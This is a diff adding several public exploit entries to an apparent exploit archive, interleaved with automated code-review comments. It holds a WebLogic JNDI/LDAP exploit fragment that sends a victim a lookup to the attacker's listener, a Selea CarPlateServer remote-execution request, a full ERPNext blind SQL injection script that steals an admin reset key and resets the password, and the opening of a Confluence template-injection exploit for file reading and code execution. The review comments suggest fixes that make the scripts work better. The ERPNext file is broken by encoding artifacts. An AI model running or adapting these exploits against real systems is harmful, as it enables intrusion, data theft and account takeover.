+ sResult = oResponse.read().decode(errors='ignore').split('\r\n')
+ bSuccess = True
+ for line in sResult:
+ if 'Authentication Denied' in line: bSuccess = False
+ if bSuccess: print('[+] Succesfully logged in!\n')
+ else: exit('[-] Authentication Denied')
+
+ ## Launch the LDAP listener and retrieve the random endpoint value
+ sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
+ if bVerbose: print('[+] Got Java value: ' + sRandom)
+
+ ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
+ print('\n[+] Firing exploit now, hold on')
+ ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
+ sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
+ sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
+ if bVerbose: print('[!] Using URL ' + sFullUrl)
+ oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
+ oResponse = oOpener.open(oRequest, timeout = iTimeout)
+ time.sleep(5)
+ bExploitWorked = False
+ for line in oRun.stdout:
+ if 'Log a request' in line: bExploitWorked = True
+ if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
+ if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
+ else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
+ if bVerbose: print(oRun.stderr)
+ endIt()
+
+if __name__ == "__main__":
+ try: main()
+ except KeyboardInterrupt: endIt()
\ No newline at end of file
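Review bot: `startListener` falls off the end and returns None when no line containing `'JDK 1.8'` appears in the jar's output (a different jar build, or start-up slower than the 3-second `join`), and `main` then fails at the `sFullUrl` concatenation with an opaque TypeError instead of a message; after `sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)` add `if not sRandom: exit('[-] Could not read the listener endpoint from the JAR output')`. `findJAVA` has a related problem: `subprocess.Popen('java -version', ...)` passes the whole string as the program name on POSIX, so on Linux it raises FileNotFoundError and the bare `except:` turns that into the misleading "java not found" exit even when Java is installed, contradicting the docstring's "Works equally well on Windows as Linux"; use `subprocess.Popen(['java', '-version'], ...)` and `except OSError:` rather than a bare except, which also swallows KeyboardInterrupt and SystemExit. The module calls the `site`-provided `exit()` throughout; `sys.exit()` is the portable form and `sys` is already imported.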
diff --git a/exploits/multiple/webapps/49452.txt b/exploits/multiple/webapps/49452.txt
new file mode 100644
index 000000000..59c937ad6
--- /dev/null
+++ b/exploits/multiple/webapps/49452.txt
@@ -0,0 +1,286 @@
+# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
+# Date: 08.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: 4.0.1.6(210120)
+ 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: Our CPS (Car Plate Server) software is an advanced solution that can
+be installed on computers and servers and used as an operations centre. It can
+create sophisticated traffic control and road safety systems connecting to
+stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert
+notifications directly to tablets or smartphones, it can receive and transfer
+data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution
+that offers full integration with main video surveillance software. Our CPS
+software connects to the national operations centre and provides law enforcement
+authorities with necessary tools to issue alerts. CPS is designed to guarantee
+cooperation among different law enforcement agencies. It allows to create a
+multi-user environment that manages different hierarchy levels and the related
+division of competences.
+
+Desc: The server suffers from an arbitrary win32/64 binary executable execution
+when setting the NO_LIST_EXE_PATH variable to a program of choice. The command
+will be executed if proper trigger criteria is met. It can be exploited via CSRF
+or by navigating to /cps/ endpoint from the camera IP and bypass authentication
+gaining the ability to modify the running configuration including changing the
+password of admin and other users.
+
+Tested on: Microsoft Windows 10 Enterprise
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5622
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php
+
+
+08.11.2020
+
+--
+
+
+POST /config_request?ACTION=WRITE HTTP/1.1
+Host: localhost:8080
+Connection: keep-alive
+Content-Length: 6309
+Authorization: Basic ZmFrZTpmYWtl
+Accept: application/json, text/plain, */*
+LoginMode: angular
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75
+AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a
+content-type: application/json
+Origin: http://localhost:8080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost:8080/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+
+{
+ "ACTIONS": {
+ "ANIA_LIST_DAYS_NUM": "15",
+ "ANIA_LIST_PWD": "",
+ "ANIA_LIST_USER": "{B64valuehereommited}",
+ "BLACK_LIST_COUNTRY": "",
+ "EXACT_MATCH": "false",
+ "FUZZY_MATCH": "true",
+ "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15",
+ "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1",
+ "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false",
+ "MINISTEROTRASPORTI_LIST_PWD": "",
+ "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false",
+ "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false",
+ "MINISTEROTRASPORTI_LIST_USER": "",
+ "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false",
+ "MINISTEROTRASPORTI_LIST_USE_VPN": "true",
+ "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "",
+ "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "",
+ "MINISTERO_LIST_DAYS_NUM": "24",
+ "MINISTERO_LIST_PWD": "",
+ "MINISTERO_LIST_USER": "",
+ "NO_LIST_ENABLED": "true",
+ "NO_LIST_ENABLE_EXE": "true",
+ "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe",
+ "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR",
+ "NO_LIST_HTTP_ENABLED": "false",
+ "NO_LIST_SEND_TCP_ALARM": "",
+ "PERMISSIVE_MATCH": "true",
+ "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": ""
+ },
+ "CAMERAINFO": {
+ "BA__________": {
+ "APPROACHING": "",
+ "CustomCameraId": "",
+ "CustomGateId": "",
+ "DetectDesc": "ZSL",
+ "DetectId": "",
+ "Direction": "",
+ "GPSLocation": "",
+ "GateDesc": "3",
+ "GateId": "",
+ "LEAVING": "",
+ "ZoneName": "",
+ "setname": "false",
+ "skip": "false"
+ }
+ },
+ "CONTEXT": {
+ "BA__________": {
+ "URL": [
+ "https://www.zeroscience.mk"
+ ]
+ }
+ },
+ "DBMS": {
+ "DB_NAME": "",
+ "DB_PASSWORD": "",
+ "DB_SERVER": "",
+ "DB_TYPE": "sqlite",
+ "DB_USERNAME": "",
+ "ENCRYPT_DB": "false",
+ "SQLITE_MAX_MB_RAM_CACHE": "-1"
+ },
+ "EMAIL": {
+ "DEST": "",
+ "FROM_EMAIL": "",
+ "FROM_NAME": "",
+ "LOG_USER_SEARCH": "false",
+ "MIN_EMAIL_TIME": "5",
+ "PASSWORD": "",
+ "PORT": "25",
+ "SEND_EMAIL_ON_TAMPER": "false",
+ "SERVER": "",
+ "SSL": "false",
+ "USERNAME": "",
+ "XOAUTH2": "false"
+ },
+ "EMAIL-XOAUTH2": {
+ "refresh_token": ""
+ },
+ "EZ_CLIENTS": {
+ "PASSWORD": "",
+ "SLAVES": "",
+ "USERNAME": "",
+ "USE_CNTLM": "false",
+ "WANT_CTX": "false"
+ },
+ "EZ_CLIENT_SCNTT": {
+ "CTX": "true",
+ "HOST": "",
+ "PASSWORD": "",
+ "PORT": "443",
+ "USERNAME": ""
+ },
+ "FTPSYNC": {
+ "DELETE_OLD_SYNC_DAYS": "7",
+ "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==",
+ "SAVE_FTP_SEND_ERRORS": "true"
+ },
+ "GLOBAL_HTTP_PROXY": {
+ "CNTLM_ENABLED": "false",
+ "EZ_ADDRESS": "cps.selea.com",
+ "EZ_PORT": "8999",
+ "HOST": "",
+ "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+",
+ "PASSWORD": "",
+ "PORT": "",
+ "PROXY_ENABLED": "true",
+ "USERNAME": ""
+ },
+ "HTTPS": {
+ "CERTIFICATE": "",
+ "ENABLE_HTTP2": "true",
+ "GET_CERTIFICATE_FROM_SELEA": "false",
+ "PRIVATE_KEY": "",
+ "ROOT_CERTIFICATE": ""
+ },
+ "MASTER_CPS": {
+ "ENABLED": "true",
+ "MASTERS": "",
+ "PASSWORD": "",
+ "USERNAME": ""
+ },
+ "PROXY_TCP": {
+ "ENABLED": "false",
+ "USE_HTTP_PROXY": "false"
+ },
+ "REMOTE_LIST": {
+ "ADDRESS": "",
+ "ENABLED": "false",
+ "PASSWORD": "",
+ "PORT": "",
+ "USERNAME": ""
+ },
+ "REPORT": {
+ "STATS_AGGREGATE": "true",
+ "STATS_ENABLED": "false",
+ "STATS_FREQ": "MONTH",
+ "STATS_PATH": "",
+ "STATS_SELECTED": "",
+ "STATS_WEEK_DAY": "Mon"
+ },
+ "SCNTT": {
+ "LIST_A1_DAYS_LIMIT": "0",
+ "SCNTT_PASSWORD": "",
+ "SCNTT_PRIV_KEY_FILENAME": "",
+ "SCNTT_PUB_CERT": "",
+ "SCNTT_SYSTEM_DESC": "",
+ "SCNTT_SYSTEM_ID": "",
+ "SCNTT_USERNAME": ""
+ },
+ "SETTINGS": {
+ "ALLOW_FLASH_NOTIFICATIONS": "true",
+ "AUTO_UPDATE": "true",
+ "BACKUP_AT_SPECIFIC_HOUR": "-1",
+ "BACKUP_DB_PATH": "",
+ "BACKUP_EVERY_HOURS": "0",
+ "CARPLATE_DETAILS_ENABLED": "false",
+ "CHECK_EXPIRING_CARPLATES": "false",
+ "CHECK_EXPIRING_CARPLATES_DAYS": "7",
+ "CHECK_FILENAME_SYNTAX": "true",
+ "DB_DELETE_DAYS": "90",
+ "DB_DELETE_ENABLE": "false",
+ "DB_DELETE_LOG_DAYS": "7",
+ "DB_DELETE_OCR_FILE": "90",
+ "DB_STATS_DELETE_DAYS": "90",
+ "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false",
+ "ENCRYPT_IMAGES": "false",
+ "FREE_DISK_LIMIT": "1000",
+ "FRIENDLY_NAME": "test",
+ "FTP_CUSTOM_PORT_RANGE": "false",
+ "FTP_DOWNLOAD_DISABLED": "true",
+ "FTP_ENABLED": "true",
+ "FTP_EXTERN_IP": "",
+ "FTP_EXTERN_IP_AUTO": "false",
+ "FTP_LIST_DIR_DISABLED": "true",
+ "FTP_MAX_PORT": "0",
+ "FTP_MIN_PORT": "0",
+ "FTP_PORT": "21",
+ "FTP_USERS": "",
+ "FTP_USE_FTPS": "true",
+ "HTTP2_PORT": "8081",
+ "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU",
+ "HTTP_PORT": "8080",
+ "HTTP_USERNAME": "admin",
+ "IGNORE_CONTEXT_FOR_UNREADFAKE": "false",
+ "IGNORE_IF_NOT_SYNTAX_MATCH": "false",
+ "MILESTONE_CONNECTIONS": "5",
+ "MILESTONE_ENABLED": "true",
+ "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false",
+ "MILESTONE_PORT": "5666",
+ "MILESTON_REMOTE_IP": "",
+ "MILESTON_REMOTE_PORT": "8080",
+ "MIN_LOG_LEVEL": "0",
+ "PERIODIC_BACKUP_CONFIG": "0",
+ "REMOVE_BLACK_LIST_ON_EXPIRE": "true",
+ "REMOVE_NON_ALARM_CARPLATE": "false",
+ "REMOVE_WHITE_LIST_ON_EXPIRE": "true",
+ "SAVE_GATEWAY_SEND_ERRORS": "true",
+ "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7",
+ "SEND_EMAIL_ON_LOST_CONNECTION": "false",
+ "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600",
+ "SEND_EMAIL_ON_NO_PLATE_READ": "false",
+ "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12",
+ "SERVER_NTP_ON": "false",
+ "SERVER_NTP_PORT": "123",
+ "USE_HTTPS": "false"
+ },
+ "VPNC": {
+ "VPN_NET_NAME": ""
+ },
+ "TCP_TEMPLATES": []
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49464.py b/exploits/multiple/webapps/49464.py
new file mode 100755
index 000000000..2582642e8
--- /dev/null
+++ b/exploits/multiple/webapps/49464.py
@@ -0,0 +1,280 @@
+# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
+# Date: 21-01-21
+# Exploit Author: Hodorsec
+# Vendor Homepage: http://erpnext.org
+# Software Link: https://erpnext.org/download
+# Version: 12.14.0
+# Tested on: Ubuntu 18.04
+
+#!/usr/bin/python3
+
+# AUTHENTICATED SQL INJECTION VULNERABILITY
+# In short:
+# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
+#
+# Longer story:
+# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
+# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
+# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
+# Test environment:
+# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
+# Cause:
+# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.
+
+# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
+# 1. Create account
+# 1.a. Use update-password link for created user received via mail
+# STEPS INCLUDED IN SCRIPT
+# 1. Login using existing low-privileged account
+# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
+# 3. Retrieve reset key for admin user
+# 4. Reset admin account using given password
+
+# DEMONSTRATION
+# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2
+# [*] Got an authenticated session, continue to perform SQL injection...
+# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
+# admin@nowhere.local
+# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1
+# [*] Sent reset request for 'admin@nowhere.local
+# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
+# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
+# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
+# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
+# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+
+# Optionally, use a proxy
+# proxy = "http://:@:"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 30
+
+# Injection prefix and suffix
+inj_prefix = "[\"select(sleep("
+inj_suffix = "))))\"]"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+ """Handles keyboardinterrupt exceptions"""
+ print("\n\n[*] User requested an interrupt, exiting...")
+ exit(0)
+
+# Custom headers
+def http_headers():
+ headers = {
+ 'User-Agent': "Mozilla",
+ }
+ return headers
+
+# Get an authenticated session
+
+def get_session(url,headers,email,password):
+ data = {'cmd':'login',
+ 'usr':email,
+ 'pwd':password,
+ 'device':'desktop'}
+ session = requests.session()
+ r = session.post(url,headers=headers,data=data,timeout=timeout,=
+allow_redirects=True,verify=False)
+ if "full_name" in r.text:
+ return session
+ else:
+ print("[!] Unable to get an authenticated session, check credentials...")
+ exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,session,headers,inj_str,sleep):
+ comment_inj_str = re.sub(" ","+",inj_str)
+ inj_params = {'cmd':'frappe.model.db_query.get_list',
+ 'filters':'["idx=1"]',
+ 'or_filters':inj_str,
+ 'fields':'idx',
+ 'doctype':'Report',
+ 'order_by':'idx',
+ 'group_by':'idx'}
+
+ # inj_params[param] = comment_inj_str
+ inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
+ms.items())
+ =20
+ # Do GET
+ r = session.get(url,params=inj_params,headers=headers,timeout=t=
+imeout,verify=False)
+ res = r.elapsed.total_seconds()
+ if res >= sleep:
+ return True
+ elif res < sleep:
+ return False
+ else:
+ print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+ exit(-1)
+
+# Loop through positions and characters
+def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
+ extracted = ""
+ max_pos_len = 35
+ # Loop through length of string
+ # Not very efficient, should use a guessing algorithm
+ for pos in range(1,max_pos_len):
+ # Test if current pos does have any valid value. If not, break
+ direction = ">"
+ inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
++ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
+ if not sqli(url,session,headers,inj_str,sleep):
+ break
+ # Loop through ASCII printable characters
+ direction = "="
+ for guess in range(ascii_begin,ascii_end+1):
+ extracted_char = chr(guess)
+ inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
+ if sqli(url,session,headers,inj_str,sleep):
+ extracted += chr(guess)
+ print(extracted_char,end='',flush=True)
+ break
+ return extracted
+
+
+def forgot_password(url,headers,sqli_email):
+ data = {'cmd':'frappe.core.doctype.user.user.reset_password',
+ 'user':sqli_email}
+ r = requests.post(url,headers=headers,data=data,verify=False,al=
+low_redirects=False,timeout=timeout)
+ if "Password reset instructions have been sent to your email" in r.text=
+:
+ return r
+
+def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
+ data = {'key':sqli_reset_key,
+ 'old_password':'',
+ 'new_password':new_password,
+ 'logout_all_sessions':'0',
+ 'cmd':'frappe.core.doctype.user.user.update_password'}
+ r = requests.post(url,headers=headers,data=data,verify=False,al=
+low_redirects=False,timeout=timeout)
+ if r.status_code == 200:
+ return r
+
+# Main
+def main(argv):
+ if len(sys.argv) == 7:
+ email = sys.argv[1]
+ password = sys.argv[2]
+ username = sys.argv[3]
+ new_password = sys.argv[4]
+ url = sys.argv[5]
+ sleep = int(sys.argv[6])
+ else:
+ print("[*] Usage: " + sys.argv[0] + " ")
+ print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
+ exit(0)
+
+ # Random headers
+ headers = http_headers()
+
+ # Sleep divide by 2 due to timing caused by specific DBMS query
+ sleep = sleep / 2
+
+ # Optional prefix / suffix
+ prefix = ""
+ suffix = ""
+
+ # Tables / columns / values
+ table = 'tabUser'
+ columns = ['name','reset_password_key']
+ sqli_email = ""
+ sqli_reset_key = ""
+
+ # Rows
+ rows = 1
+
+ # Do stuff
+ try:
+ # Get an authenticated session
+ session = get_session(url,headers,email,password)
+ if session:
+ print("[*] Got an authenticated session, continue to perform SQL injection...")
+ =20
+ # Getting values for found rows in specified columns
+ for column in columns:
+ print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
+ for row in range(0,rows):
+ retrieved = get_data(url,session,headers,prefix,suffix,ro=
+w,column,table,username,sleep)
+ print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
+ if column == 'name':
+ sqli_email = retrieved
+ # Generate a reset token in database
+ if forgot_password(url,headers,sqli_email):
+ print("[*] Sent reset request for '" + sqli_email + "'"=
+)
+ else:
+ print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
+ exit(-1)
+ elif column == 'reset_password_key':
+ sqli_reset_key = retrieved
+
+ # Print retrieved values
+ print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
+sqli_reset_key + "'")
+
+ # Reset the desired account
+ if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
+):
+ print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
+ else:
+ print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
+ exit(-1)
+ =20
+ # Done
+ print("\n[+] Done!\n")
+ except requests.exceptions.Timeout:
+ print("[!] Timeout error\n")
+ exit(-1)
+ except requests.exceptions.TooManyRedirects:
+ print("[!] Too many redirects\n")
+ exit(-1)
+ except requests.exceptions.ConnectionError:
+ print("[!] Not able to connect to URL\n")
+ exit(-1)
+ except requests.exceptions.RequestException as e:
+ print("[!] " + str(e))
+ exit(-1)
+ except requests.exceptions.HTTPError as e:
+ print("[!] Failed with error code - " + str(e.code) + "\n")
+ exit(-1)
+ except KeyboardInterrupt:
+ keyboard_interrupt()
+ exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+ main(sys.argv[1:])
+
+# Timeline:
+# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
+# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
+# 21-01-21: No response received, public disclosure
\ No newline at end of file
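Review bot: The file as committed is not valid Python because it still carries quoted-printable transfer-encoding artifacts: a trailing `=` soft line break splits single statements across two lines in `get_session` (`session.post(... timeout=timeout,=` / `allow_redirects=True, ...)`), in `sqli` (the `inj_params_unencoded` join and the `session.get` call), in `get_data` (the first `inj_str` concatenation), in `forgot_password` and `reset_account` (the `requests.post` calls and the `if ... in r.text=` line), and in `main` (the `get_data`, `print` and `reset_account` calls), while `=20` stands in for a blank indented line in `sqli` and twice in `main`. This looks like the mail-transport copy was imported rather than the author's original, so the archive entry does not match what was published and should be re-imported from the source submission instead of being patched by hand. Separately, `sqli` has an unreachable `else` after the exhaustive `res >= sleep` / `res < sleep` pair and computes `comment_inj_str` and `inj_params_unencoded` without using them, `main(argv)` ignores its parameter and reads `sys.argv` directly, and the `#!/usr/bin/python3` shebang sits below the header comment block rather than on line 1, so it has no effect.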
diff --git a/exploits/multiple/webapps/49465.py b/exploits/multiple/webapps/49465.py
new file mode 100755
index 000000000..68e977e73
--- /dev/null
+++ b/exploits/multiple/webapps/49465.py
@@ -0,0 +1,778 @@
+# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI
+# Date: 21-Jan-2021
+# Exploit Author: 46o60
+# Vendor Homepage: https://www.atlassian.com/software/confluence
+# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
+# Version: 6.12.1
+# Tested on: Ubuntu 20.04.1 LTS
+# CVE : CVE-2019-3396
+
+#!/usr/bin/env python3
+# -*- coding: UTF-8 -*-
+"""
+
+Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian
+Confluence Server server-side template injection.
+
+Vulnerability information:
+ Authors:
+ Daniil Dmitriev - Discovering vulnerability
+ Dmitry (rrock) Shchannikov - Metasploit module
+ Exploit
+ ExploitDB:
+ https://www.exploit-db.com/exploits/46731
+ Metasploit
+ https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/
+ exploit/multi/http/confluence_widget_connector
+
+While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made
+from the target Confluence server towards attacker's server where the Velocity template with the payload is being
+hosted. If this is not possible, for example, because network where the target Confluence server is located filters all
+outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this
+alternative approach by first uploading the template to the server and then loading it with original vulnerability from
+local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any
+user can upload a file to the server by attaching the file to his "personal space".
+
+There are two modes of the exploit:
+ 1. Exploiting path traversal for file disclosure and directory listings.
+ 2. RCE by uploading a template file with payload to the server.
+
+In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged
+user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode
+of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path
+is pointing to. As in original exploit no authentication is needed for this mode.
+
+Limitations of path traversal exploit:
+- not possible to distinguish between non-existent path and lack of permissions
+- no distinction between files and directories in the output
+
+If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A
+regular user probably has enough privileges for this since each user can have their own personal space where they
+should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not
+exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file
+with payload from local filesystem instead from remote system.
+
+Prerequisite of RCE in this exploit:
+- authenticated session is needed
+- knowledge of where attached files are stored on the file system - if it is not default location then use first mode
+to find it, should be in Confluence install directory under ./attachments subdirectory
+
+Usage
+- list /etc folder on Confluence server hosted on http://confluence.example.com
+ python exploit.py -th confluence.example.com fs /etc
+- get content of /etc/passwd on same server but through a proxy
+ python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd
+- execute 'whoami' command on the same server (this will upload a template file with payload to the server using
+existing session)
+ python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami"
+
+Tested on Confluence versions:
+ 6.12.1
+
+To test the exploit:
+ 1. Download Confluence trial version for version 6.12.1
+ https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
+ (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser
+ network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and
+ change the version in URL to be 6.12.1)
+ SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin
+ 2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default.
+ chmod +x atlassian-confluence-6.12.1-x64.bin
+ sudo ./atlassian-confluence-6.12.1-x64.bin
+ 3. Open the browser to configure initial installation, when you get to license window copy the server ID.
+ 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID.
+ 5. Activate the license and finish the installation with default options.
+ 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the
+ exploit.
+ 7. Run the exploit (see usage above).
+"""
+
+__version__ = "1.0.0"
+__author__ = "46o60"
+
+import argparse
+import logging
+import requests
+import urllib3
+from bs4 import BeautifulSoup
+import re
+import json
+import random
+import string
+
+# script and banner
+SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script"
+ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____
+| | | |\ | |___ | | | |___ |\ | | | | |__/
+|___ |__| | \| | |___ |__| |___ | \| |___ |__| | \
+
+"""
+
+# turn off requests log output
+urllib3.disable_warnings()
+logging.getLogger("urllib3").setLevel(logging.WARNING)
+
+
+def print_banner():
+ """
+ Prints script ASCII banner and basic information.
+
+ Because it is cool.
+ """
+ print(ASCII_BANNER_TEXT)
+ print("{} v{}".format(SCRIPT_NAME, __version__))
+ print("Author: {}".format(__author__))
+ print()
+
+
+def exit_log(logger, message):
+ """
+ Utility function to log exit message and finish the script.
+ """
+ logger.error(message)
+ exit(1)
+
+
+def check_cookie_format(value):
+ """
+ Checks if value is in format: ^[^=]+=[^=]+$
+ """
+ pattern = r"^[^=]+=[^=]+$"
+ if not re.match(pattern, value):
+ raise argparse.ArgumentTypeError("provided cookie string does not have correct format")
+ return value
+
+
+def parse_arguments():
+ """
+ Performs parsing of script arguments.
+ """
+ # creating parser
+ parser = argparse.ArgumentParser(
+ prog=SCRIPT_NAME,
+ description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload."
+ )
+
+ # general script arguments
+ parser.add_argument(
+ "-V", "--version",
+ help="displays the current version of the script",
+ action="version",
